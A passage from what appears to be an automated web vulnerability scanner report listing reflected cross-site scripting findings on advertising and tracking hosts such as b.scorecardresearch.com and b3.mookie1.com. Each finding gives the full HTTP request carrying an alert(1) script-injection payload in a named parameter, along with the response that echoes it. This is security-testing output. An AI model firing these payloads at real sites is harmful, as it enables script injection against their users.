User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 23 Jun 2011 11:26:41 GMT
Date: Thu, 16 Jun 2011 11:26:41 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"1000004", c3:"", c4:"ae68d<script>alert(1)</script>c0ba3c3354f", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.41. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload fe356<script>alert(1)</script>5c3b1b9bf10 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=1000004&c3=&c4=&c5=fe356<script>alert(1)</script>5c3b1b9bf10&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 23 Jun 2011 11:26:43 GMT
Date: Thu, 16 Jun 2011 11:26:43 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"1000004", c3:"", c4:"", c5:"fe356<script>alert(1)</script>5c3b1b9bf10", c6:"", c10:"", c15:"", c16:"", r:""});

3.42. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 31a2f<script>alert(1)</script>d7030722ddf was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=1000004&c3=&c4=&c5=&c6=31a2f<script>alert(1)</script>d7030722ddf&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 23 Jun 2011 11:26:44 GMT
Date: Thu, 16 Jun 2011 11:26:44 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"1000004", c3:"", c4:"", c5:"", c6:"31a2f<script>alert(1)</script>d7030722ddf", c10:"", c15:"", c16:"", r:""});

3.43. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fc9c"><script>alert(1)</script>49666ef85e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B34fc9c"><script>alert(1)</script>49666ef85e3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660; id=2814750682866683; session=1308239531|1308239531

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:54:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B34fc9c"><script>alert(1)</script>49666ef85e3/Motorola/2011Q2_Atrix/CPC/300/696695297/x90/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

3.44. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af1b"><script>alert(1)</script>0d2e8525275 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Motorola5af1b"><script>alert(1)</script>0d2e8525275/2011Q2_Atrix/CPC/300/11117403339@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660; id=2814750682866683; session=1308239531|1308239531

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:54:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 355
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Motorola5af1b"><script>alert(1)</script>0d2e8525275/2011Q2_Atrix/CPC/300/1487374096/x90/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

3.45. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 691ad"><script>alert(1)</script>b640a3042ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Motorola/2011Q2_Atrix691ad"><script>alert(1)</script>b640a3042ed/CPC/300/11117403339@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660; id=2814750682866683; session=1308239531|1308239531

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:55:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Motorola/2011Q2_Atrix691ad"><script>alert(1)</script>b640a3042ed/CPC/300/636345949/x90/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

3.46. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd39e"><script>alert(1)</script>beb04ad139d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Motorola/2011Q2_Atrix/CPCcd39e"><script>alert(1)</script>beb04ad139d/300/11117403339@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660; id=2814750682866683; session=1308239531|1308239531

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 355
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Motorola/2011Q2_Atrix/CPCcd39e"><script>alert(1)</script>beb04ad139d/300/1294525575/x90/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

3.47. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad52"><script>alert(1)</script>bae7e94f22d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Motorola/2011Q2_Atrix/CPC/3002ad52"><script>alert(1)</script>bae7e94f22d/11117403339@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660; id=2814750682866683; session=1308239531|1308239531

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:55:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 355
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Motorola/2011Q2_Atrix/CPC/3002ad52"><script>alert(1)</script>bae7e94f22d/1865151897/x90/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

3.48. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a2b1"><script>alert(1)</script>8cc8c5d7015 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x901a2b1"><script>alert(1)</script>8cc8c5d7015 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660; id=2814750682866683; session=1308239531|1308239531

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:55:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 347
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Motorola/2011Q2_Atrix/CPC/300/1649177555/x901a2b1"><script>alert(1)</script>8cc8c5d7015/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

3.49. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8b49"><script>alert(1)</script>12bfdb1b883 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMd8b49"><script>alert(1)</script>12bfdb1b883/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/12107855819@x23?USNetwork/Moto_2011Q2_Atrix_247_CPC_300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; RMFM=011QXErgU10I1k; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; Motorola=247B3; dlx_20100929=set; other_20110126=set; id=2814750682866683; session=1308239531|1308240466

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:11:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DMd8b49"><script>alert(1)</script>12bfdb1b883/DLX/1926900975/x71/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SR
...[SNIP]...

3.50. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6104b"><script>alert(1)</script>e9aff56da1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX6104b"><script>alert(1)</script>e9aff56da1/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/12107855819@x23?USNetwork/Moto_2011Q2_Atrix_247_CPC_300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; RMFM=011QXErgU10I1k; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; Motorola=247B3; dlx_20100929=set; other_20110126=set; id=2814750682866683; session=1308239531|1308240466

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:11:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX6104b"><script>alert(1)</script>e9aff56da1/1302579654/x71/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SRC
...[SNIP]...

3.51. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1bb0"><script>alert(1)</script>9b2b4434af8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x71f1bb0"><script>alert(1)</script>9b2b4434af8 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/12107855819@x23?USNetwork/Moto_2011Q2_Atrix_247_CPC_300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; RMFM=011QXErgU10I1k; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; Motorola=247B3; dlx_20100929=set; other_20110126=set; id=2814750682866683; session=1308239531|1308240466

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:11:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/280293022/x71f1bb0"><script>alert(1)</script>9b2b4434af8/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SRC
...[SNIP]...

3.52. http://click.linksynergy.com/fs-bin/click [offerid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 33556<script>alert(1)</script>56fa4196bb8 was submitted in the offerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs-bin/click?id=EhraRx8K/BE&offerid=33556<script>alert(1)</script>56fa4196bb8&type=3&subid=0&u1=112921cf20116d066717054a40e927 HTTP/1.1
Host: click.linksynergy.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=1477&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 258
Date: Fri, 17 Jun 2011 10:41:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Bad number format in offerid: For input string: "33556<script>alert(1)</script>56fa4196bb8"
</body>
...[SNIP]...

3.53. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 805e3"-alert(1)-"23623874ae9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com805e3"-alert(1)-"23623874ae9/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F4795224B77E44FF9113ADD0BEDC8D8D; Path=/
Content-Type: text/javascript
Content-Length: 8179
Date: Thu, 16 Jun 2011 14:14:05 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com805e3"-alert(1)-"23623874ae9/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://w
...[SNIP]...

3.54. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e47fe"-alert(1)-"368a11f0bb0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013e47fe"-alert(1)-"368a11f0bb0/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
